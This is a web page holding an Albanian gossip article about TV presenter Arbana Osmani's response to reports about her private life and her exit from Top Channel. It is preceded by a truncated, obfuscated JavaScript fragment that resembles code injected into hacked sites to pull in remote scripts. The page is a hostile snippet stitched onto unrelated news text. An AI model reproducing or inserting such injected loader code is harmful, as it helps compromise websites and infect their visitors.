;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Arbana Osmani flet vetë më në fund mbi gjithçka që u aludua

By

Emri i Arbana Osmanit ka javë prej kur është kryetemë në portale.

U nis së pari me raportimet për ndarjen nga bashkëshorti e më pas, u vazhdua me shkrimet për lidhjen e re të supozuar me regjisorin e programit, Eduart Grishaj.

E këtë javë, Arbana mbushi sërish ballinat me një tjetër raportim.

U tha se prezantuesja dhe autorja e ‘Dua të të bëj të lumtur’ u largua nga Top Channel teksa arsyet u shndërruan në një dramë në vete.

Nga përplasja me Drejtorin Blushi tek problemet financiare, ato të lidhura me Renato Mekollin e së fundmi edhe mbi një postim përkrahës për të dashurin regjisor, pothuajse nuk ngeli gjë pa u aluduar tek arsyet e ‘largimit’.

E më në fund, ka reaguar vetë Arbana.

Siç vepron rëndom çdo javë, ajo ka paralajmëruar shikuesit për takimin e rradhës shoqëruar me një thumb tek pjesa e falenderimeve. Përpos falenderimeve për grimeren e frizeren, Arbana ka rezervuar një koment edhe për portalet ‘për shfrenimin e fantazisë në lajme nga më të pabesueshmet por që gjithsesi, shumë argëtuese’.

Shumë zhurmë për asgjë, sërish! /Prive.al

Artikuj të ngjashëm